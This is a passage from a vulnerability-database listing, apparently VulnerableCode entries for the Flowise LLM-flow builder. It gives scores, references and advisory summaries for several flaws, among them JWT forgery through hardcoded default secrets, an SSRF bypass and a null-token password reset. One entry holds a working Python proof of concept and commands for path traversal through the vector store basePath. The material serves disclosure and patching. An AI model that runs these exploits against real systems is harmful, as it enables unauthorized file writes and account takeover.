aliases CVE-2026-46480, GHSA-wxrr-jp8m-qq7f
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-s3jg-wce1-fbf3
47
url VCID-tdm1-91mc-8kgr
vulnerability_id VCID-tdm1-91mc-8kgr
summary 
Flowise: Weak Default JWT Secrets
**Detection Method:** Kolega.dev Deep Code Scan

| Attribute | Value |
|---|---|
| Severity | Critical |
| Location | packages/server/src/enterprise/middleware/passport/index.ts:29-34 |
| Practical Exploitability | High |
| Developer Approver | faizan@kolega.ai |

### Description
JWT secrets have weak hardcoded defaults ('auth_token', 'refresh_token', 'AUDIENCE', 'ISSUER'). Attackers can forge valid JWTs and impersonate any user.

### Affected Code
```
const jwtAudience = process.env.JWT_AUDIENCE || 'AUDIENCE'
const jwtIssuer = process.env.JWT_ISSUER || 'ISSUER'
const jwtAuthTokenSecret = process.env.JWT_AUTH_TOKEN_SECRET || 'auth_token'
const jwtRefreshSecret = process.env.JWT_REFRESH_TOKEN_SECRET || process.env.JWT_AUTH_TOKEN_SECRET || 'refresh_token'
```

### Evidence
All JWT defaults are weak strings. Refresh token falls back to auth token which is a design flaw. If any environment variable is unset, weak default is used.

### Impact
Complete authentication bypass. Attackers can forge valid JWTs for any user account. No authentication required to access protected endpoints. Can escalate to admin access.

### Recommendation
Remove all default secrets - require all JWT environment variables to be explicitly set. Add startup validation throwing error if any JWT secret is missing. Use cryptographically random secrets (256+ bits) for each secret independently. Implement JWT secret rotation mechanism.

### Notes
The JWT secrets have genuinely weak hardcoded defaults ('auth_token', 'refresh_token', 'AUDIENCE', 'ISSUER') at lines 29-34. If an administrator deploys without setting the environment variables JWT_AUTH_TOKEN_SECRET, JWT_REFRESH_TOKEN_SECRET, JWT_AUDIENCE, and JWT_ISSUER, the application will use these trivially guessable values. An attacker knowing these defaults (which are publicly visible in the source code) can forge valid JWTs to impersonate any user, including administrators. The fallback chain at line 34 where jwtRefreshSecret falls back to jwtAuthTokenSecret is an additional design weakness - if only JWT_AUTH_TOKEN_SECRET is set, both tokens share the same secret. While .env.example files provide placeholder values, these are also weak and publicly visible. The application should fail to start if these secrets are not explicitly configured with strong values, rather than silently falling back to insecure defaults.
references
0
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cc4f-hjpj-g9p8
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cc4f-hjpj-g9p8
1
reference_url https://github.com/advisories/GHSA-cc4f-hjpj-g9p8
reference_id GHSA-cc4f-hjpj-g9p8
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-cc4f-hjpj-g9p8
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases GHSA-cc4f-hjpj-g9p8
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-tdm1-91mc-8kgr
48
url VCID-v1nz-wwsu-qycg
vulnerability_id VCID-v1nz-wwsu-qycg
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Server-Side Request Forgery (SSRF) protection bypass vulnerability exists in the Custom Function feature. While the application implements SSRF protection via HTTP_DENY_LIST for axios and node-fetch libraries, the built-in Node.js http, https, and net modules are allowed in the NodeVM sandbox without equivalent protection. This allows authenticated users to bypass SSRF controls and access internal network resources (e.g., cloud provider metadata services) This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41270
reference_id
reference_type
scores
0
value 0.00083
scoring_system epss
scoring_elements 0.24464
published_at 2026-06-13T12:55:00Z
1
value 0.00083
scoring_system epss
scoring_elements 0.24258
published_at 2026-06-11T12:55:00Z
2
value 0.00083
scoring_system epss
scoring_elements 0.24454
published_at 2026-06-12T12:55:00Z
3
value 0.00083
scoring_system epss
scoring_elements 0.24447
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41270
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41270
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41270
2
reference_url https://github.com/advisories/GHSA-xhmj-rg95-44hv
reference_id GHSA-xhmj-rg95-44hv
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xhmj-rg95-44hv
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-xhmj-rg95-44hv
reference_id GHSA-xhmj-rg95-44hv
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L
2
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-25T01:27:48Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-xhmj-rg95-44hv
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41270, GHSA-xhmj-rg95-44hv
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-v1nz-wwsu-qycg
49
url VCID-v9hg-7pex-g3dp
vulnerability_id VCID-v9hg-7pex-g3dp
summary 
Flowise: Path Traversal in Vector Store basePath
## Summary

The Faiss and SimpleStore (LlamaIndex) vector store implementations accept a `basePath` parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem.

## Vulnerability Details

| Field | Value |
|-------|-------|
| Affected File | `packages/components/nodes/vectorstores/Faiss/Faiss.ts` (lines 79, 91) |
| Affected File | `packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts` (lines 83-104) |

## Prerequisites

1. **Authentication**: Valid API token with `documentStores:upsert-config` permission
2. **Document Store**: An existing Document Store with at least one processed chunk
3. **Embedding Credentials**: Valid embedding provider credentials (e.g., OpenAI API key)

## Root Cause

### Faiss (`Faiss.ts`)

```typescript
async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
    const basePath = nodeData.inputs?.basePath as string  // User-controlled
    // ...
    const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings)
    await vectorStore.save(basePath)  // Direct filesystem write, no validation
}
```

### SimpleStore (`SimpleStore.ts`)

```typescript
async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
    const basePath = nodeData.inputs?.basePath as string  // User-controlled
    
    let filePath = ''
    if (!basePath) filePath = path.join(getUserHome(), '.flowise', 'llamaindex')
    else filePath = basePath  // Used directly without sanitization
    
    const storageContext = await storageContextFromDefaults({ persistDir: filePath })  // Writes to arbitrary path
}
```

## Impact

An authenticated attacker can:

1. **Write files to arbitrary locations** on the server filesystem
2. **Overwrite existing files** if the process has write permissions
3. **Potential for code execution** by writing to web-accessible directories or startup scripts
4. **Data exfiltration** by writing to network-mounted filesystems

## Proof of Concept

### poc.py

```python
#!/usr/bin/env python3
"""
POC: Path Traversal in Vector Store basePath (CWE-22)

Usage:
  python poc.py --target http://localhost:3000 --token <API_KEY> --store-id <STORE_ID> --credential <EMBEDDING_CREDENTIAL_ID>
"""

import argparse
import json
import urllib.request
import urllib.error

def post_json(url, data, headers):
    req = urllib.request.Request(
        url,
        data=json.dumps(data).encode("utf-8"),
        headers={**headers, "Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=120) as resp:
        return resp.status, resp.read().decode("utf-8", errors="replace")

def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--target", required=True)
    ap.add_argument("--token", required=True)
    ap.add_argument("--store-id", required=True)
    ap.add_argument("--credential", required=True)
    ap.add_argument("--base-path", default="/tmp/flowise-path-traversal-poc")
    args = ap.parse_args()

    payload = {
        "storeId": args.store_id,
        "vectorStoreName": "faiss",
        "vectorStoreConfig": {"basePath": args.base_path},
        "embeddingName": "openAIEmbeddings",
        "embeddingConfig": {"credential": args.credential},
    }

    url = args.target.rstrip("/") + "/api/v1/document-store/vectorstore/insert"
    headers = {"Authorization": f"Bearer {args.token}"}

    try:
        status, body = post_json(url, payload, headers)
        print(body)
    except urllib.error.HTTPError as e:
        print(e.read().decode())

if __name__ == "__main__":
    main()
```

### Setup

1. Create a Document Store in Flowise UI
2. Add a Document Loader (e.g., Plain Text) with any content
3. Click "Process" to create chunks
4. Note the Store ID from the URL
5. Get your embedding credential ID from Settings → Credentials

### Exploitation

```bash
# Write to /tmp
python poc.py \
  --target http://127.0.0.1:3000 \
  --token <API_TOKEN> \
  --store-id <STORE_ID> \
  --credential <OPENAI_CREDENTIAL_ID> \
  --base-path /tmp/flowise-pwned

# Path traversal variant
python poc.py \
  --target http://127.0.0.1:3000 \
  --token <API_TOKEN> \
  --store-id <STORE_ID> \
  --credential <OPENAI_CREDENTIAL_ID> \
  --base-path "../../../../tmp/traversal-test"
```

### Evidence

```
$ python poc.py --target http://127.0.0.1:3000/ --token <TOKEN> --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned

{"numAdded":1,"addedDocs":[{"pageContent":"Lorem Ipsum","metadata":{"docId":"d84d9581-0778-454d-984e-42b372b1b555"}}],"totalChars":0,"totalChunks":0,"whereUsed":[]}

$ ls -la /tmp/flowise-pwned/
total 16
drwxr-xr-x  4 user  wheel   128 Jan 17 12:00 .
drwxrwxrwt 12 root  wheel   384 Jan 17 12:00 ..
-rw-r--r--  1 user  wheel  1234 Jan 17 12:00 docstore.json
-rw-r--r--  1 user  wheel  5678 Jan 17 12:00 faiss.index
```
references
0
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-w6v6-49gh-mc9w
reference_id
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
1
value 4.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:H/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-w6v6-49gh-mc9w
1
reference_url https://github.com/advisories/GHSA-w6v6-49gh-mc9w
reference_id GHSA-w6v6-49gh-mc9w
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-w6v6-49gh-mc9w
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases GHSA-w6v6-49gh-mc9w
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-v9hg-7pex-g3dp
50
url VCID-w9yr-5jbp-q7fm
vulnerability_id VCID-w9yr-5jbp-q7fm
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, this vulnerability allows remote attackers to bypass authentication on affected installations of FlowiseAI Flowise. Authentication is not required to exploit this vulnerability. The specific flaw exists within the resetPassword method of the AccountService class. There is no check performed to ensure that a password reset token has actually been generated for a user account. By default the value of the reset token stored in a users account is null, or an empty string if they've reset their password before. An attacker with knowledge of the user's email address can submit a request to the "/api/v1/account/reset-password" endpoint containing a null or empty string reset token value and reset that user's password to a value of their choosing. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41276
reference_id
reference_type
scores
0
value 0.00732
scoring_system epss
scoring_elements 0.73265
published_at 2026-06-13T12:55:00Z
1
value 0.00732
scoring_system epss
scoring_elements 0.73264
published_at 2026-06-14T12:55:00Z
2
value 0.00732
scoring_system epss
scoring_elements 0.73173
published_at 2026-06-11T12:55:00Z
3
value 0.00732
scoring_system epss
scoring_elements 0.7325
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41276
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41276
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41276
2
reference_url https://github.com/advisories/GHSA-f6hc-c5jr-878p
reference_id GHSA-f6hc-c5jr-878p
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-f6hc-c5jr-878p
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-f6hc-c5jr-878p
reference_id GHSA-f6hc-c5jr-878p
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T14:43:03Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-f6hc-c5jr-878p
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41276, GHSA-f6hc-c5jr-878p
risk_score 4.4
exploitability 0.5
weighted_severity 8.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-w9yr-5jbp-q7fm
51
url VCID-xt1d-efw7-g3c6
vulnerability_id VCID-xt1d-efw7-g3c6
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-46443
reference_id
reference_type
scores
0
value 0.00032
scoring_system epss
scoring_elements 0.09899
published_at 2026-06-11T12:55:00Z
1
value 0.00042
scoring_system epss
scoring_elements 0.13124
published_at 2026-06-12T12:55:00Z
2
value 0.00042
scoring_system epss
scoring_elements 0.1313
published_at 2026-06-13T12:55:00Z
3
value 0.00047
scoring_system epss
scoring_elements 0.14913
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-46443
1
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7g73-99r4-m4mj
reference_id
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 7.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7g73-99r4-m4mj
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-46443
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-46443
3
reference_url https://github.com/advisories/GHSA-7g73-99r4-m4mj
reference_id GHSA-7g73-99r4-m4mj
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7g73-99r4-m4mj
fixed_packages
0
url pkg:npm/flowise@3.1.2
purl pkg:npm/flowise@3.1.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.2
aliases CVE-2026-46443, GHSA-7g73-99r4-m4mj
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xt1d-efw7-g3c6
52
url VCID-ywgu-76cy-uqe7
vulnerability_id VCID-ywgu-76cy-uqe7
summary Flowise Fails to Invalidate Existing Sessions After Password Changes
references
0
reference_url https://github.com/FlowiseAI/Flowise/pull/5294
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/pull/5294
1
reference_url https://github.com/advisories/GHSA-x7rp-qj2h-ghgw
reference_id GHSA-x7rp-qj2h-ghgw
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-x7rp-qj2h-ghgw
2
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x7rp-qj2h-ghgw
reference_id GHSA-x7rp-qj2h-ghgw
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x7rp-qj2h-ghgw
fixed_packages
0
url pkg:npm/flowise@3.0.10
purl pkg:npm/flowise@3.0.10
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-3chx-dj2u-kbab
6
vulnerability VCID-3gp6-wwtd-kkf1
7
vulnerability VCID-488c-vrqu-f7hf
8
vulnerability VCID-5j9e-bcr5-n7bs
9
vulnerability VCID-5pup-kgaf-3ubw
10
vulnerability VCID-67mz-pfy4-ykep
11
vulnerability VCID-6ufs-d346-d7ev
12
vulnerability VCID-71uq-yx2j-cqak
13
vulnerability VCID-9bht-svq8-87b4
14
vulnerability VCID-9rqv-p7rz-5kar
15
vulnerability VCID-a1e4-f5dh-w3a5
16
vulnerability VCID-affy-v76q-fub6
17
vulnerability VCID-aqg8-6us7-uqef
18
vulnerability VCID-b97u-efzx-dffn
19
vulnerability VCID-bkmk-k9mn-ekhx
20
vulnerability VCID-cb6d-4c2v-w7c3
21
vulnerability VCID-cxja-9yxc-k7au
22
vulnerability VCID-d4wa-szeh-43ab
23
vulnerability VCID-dtss-epth-z7fh
24
vulnerability VCID-dzed-27rk-3qav
25
vulnerability VCID-e65e-s5sd-kuhp
26
vulnerability VCID-ejdc-j73x-jydk
27
vulnerability VCID-fu6t-9dk4-jbh9
28
vulnerability VCID-gt6n-beak-33gy
29
vulnerability VCID-gvpx-4wkw-43cz
30
vulnerability VCID-hdej-umwh-kqav
31
vulnerability VCID-hkfs-v3bp-kbh5
32
vulnerability VCID-j5hh-haj2-qydg
33
vulnerability VCID-jcze-eg2c-mkcf
34
vulnerability VCID-k579-xd81-hqdu
35
vulnerability VCID-kpyg-gve3-b3av
36
vulnerability VCID-ksmv-s6c9-t7ap
37
vulnerability VCID-m3j3-4u39-euht
38
vulnerability VCID-pzza-9xq9-a7de
39
vulnerability VCID-qm89-q2ar-uyhy
40
vulnerability VCID-r74e-k86f-7qgb
41
vulnerability VCID-rgmv-6bqh-eqf2
42
vulnerability VCID-s3jg-wce1-fbf3
43
vulnerability VCID-tdm1-91mc-8kgr
44
vulnerability VCID-v1nz-wwsu-qycg
45
vulnerability VCID-v9hg-7pex-g3dp
46
vulnerability VCID-w9yr-5jbp-q7fm
47
vulnerability VCID-xt1d-efw7-g3c6
48
vulnerability VCID-z1y2-f2ws-8ycb
49
vulnerability VCID-zwna-stj5-3yhm
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.10
aliases GHSA-x7rp-qj2h-ghgw
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ywgu-76cy-uqe7
53
url VCID-z1y2-f2ws-8ycb
vulnerability_id VCID-z1y2-f2ws-8ycb
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, a mass assignment vulnerability exists in the tool update endpoint of FlowiseAI. The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating a tool resource. Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign tools to arbitrary workspaces. This breaks tenant isolation in multi-workspace environments. This issue has been patched in version 3.1.2.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42862
reference_id
reference_type
scores
0
value 0.00043
scoring_system epss
scoring_elements 0.13423
published_at 2026-06-11T12:55:00Z
1
value 0.00055
scoring_system epss
scoring_elements 0.17741
published_at 2026-06-13T12:55:00Z
2
value 0.00055
scoring_system epss
scoring_elements 0.17724
published_at 2026-06-12T12:55:00Z
3
value 0.00062
scoring_system epss
scoring_elements 0.1966
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42862
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42862
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42862
2
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
reference_id flowise%403.1.2
reference_type
scores
0
value 7.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-08T15:51:43Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
3
reference_url https://github.com/advisories/GHSA-x5v6-pj28-cwwm
reference_id GHSA-x5v6-pj28-cwwm
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-x5v6-pj28-cwwm
4
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x5v6-pj28-cwwm
reference_id GHSA-x5v6-pj28-cwwm
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 7.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-08T15:51:43Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x5v6-pj28-cwwm
fixed_packages
0
url pkg:npm/flowise@3.1.2
purl pkg:npm/flowise@3.1.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.2
aliases CVE-2026-42862, GHSA-x5v6-pj28-cwwm
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-z1y2-f2ws-8ycb
54
url VCID-zwna-stj5-3yhm
vulnerability_id VCID-zwna-stj5-3yhm
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the GET /api/v1/public-chatflows/:id endpoint returns the full chatflow object without sanitization for public chatflows. Docker validation revealed this is worse than initially assessed: the sanitizeFlowDataForPublicEndpoint function does NOT exist in the released v3.0.13 Docker image. Both public-chatflows AND public-chatbotConfig return completely raw flowData including credential IDs, plaintext API keys, and password-type fields. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41278
reference_id
reference_type
scores
0
value 0.00034
scoring_system epss
scoring_elements 0.10515
published_at 2026-06-13T12:55:00Z
1
value 0.00034
scoring_system epss
scoring_elements 0.10491
published_at 2026-06-14T12:55:00Z
2
value 0.00034
scoring_system epss
scoring_elements 0.10461
published_at 2026-06-11T12:55:00Z
3
value 0.00034
scoring_system epss
scoring_elements 0.10514
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41278
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41278
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41278
2
reference_url https://github.com/advisories/GHSA-w47f-j8rh-wx87
reference_id GHSA-w47f-j8rh-wx87
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-w47f-j8rh-wx87
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-w47f-j8rh-wx87
reference_id GHSA-w47f-j8rh-wx87
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
